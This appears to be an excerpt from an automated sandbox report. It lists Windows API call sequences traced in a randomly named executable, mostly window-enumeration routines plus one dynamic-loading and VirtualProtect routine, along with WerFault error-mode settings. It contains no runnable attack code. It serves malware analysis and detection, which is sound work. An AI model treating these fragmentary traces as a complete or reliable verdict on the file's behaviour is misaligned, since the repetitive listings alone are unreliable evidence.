Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_0159CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,25_2_0159CDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_0159CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,25_2_0159CDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_0159CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,25_2_0159CFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_0159CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,25_2_0159CFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_01599ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,25_2_01599ED0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AED300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,27_2_00AED300
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AECDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,27_2_00AECDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AECDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,27_2_00AECDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AECDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,27_2_00AECDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AECDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,27_2_00AECDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AECD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,27_2_00AECD50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AE9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,27_2_00AE9ED0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AECFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,27_2_00AECFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AECFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,27_2_00AECFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012AD300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,29_2_012AD300
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012ACD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,29_2_012ACD50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012ACDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,29_2_012ACDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012ACDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,29_2_012ACDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012ACDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,29_2_012ACDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012ACDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,29_2_012ACDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012ACFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,29_2_012ACFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012ACFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,29_2_012ACFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012A9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,29_2_012A9ED0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0111D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,31_2_0111D300
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0111CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,31_2_0111CD50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0111CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,31_2_0111CDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0111CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,31_2_0111CDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0111CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,31_2_0111CDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0111CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,31_2_0111CDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0111CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,31_2_0111CFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0111CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,31_2_0111CFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01119ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,31_2_01119ED0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012FD300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,33_2_012FD300
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012FCD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,33_2_012FCD50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012FCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,33_2_012FCDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012FCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,33_2_012FCDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012FCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,33_2_012FCDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012FCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,33_2_012FCDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012FCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,33_2_012FCFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012FCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,33_2_012FCFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012F9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,33_2_012F9ED0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012F1190 GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,VirtualProtect,VirtualProtect,VirtualProtect,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,22_2_012F1190
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
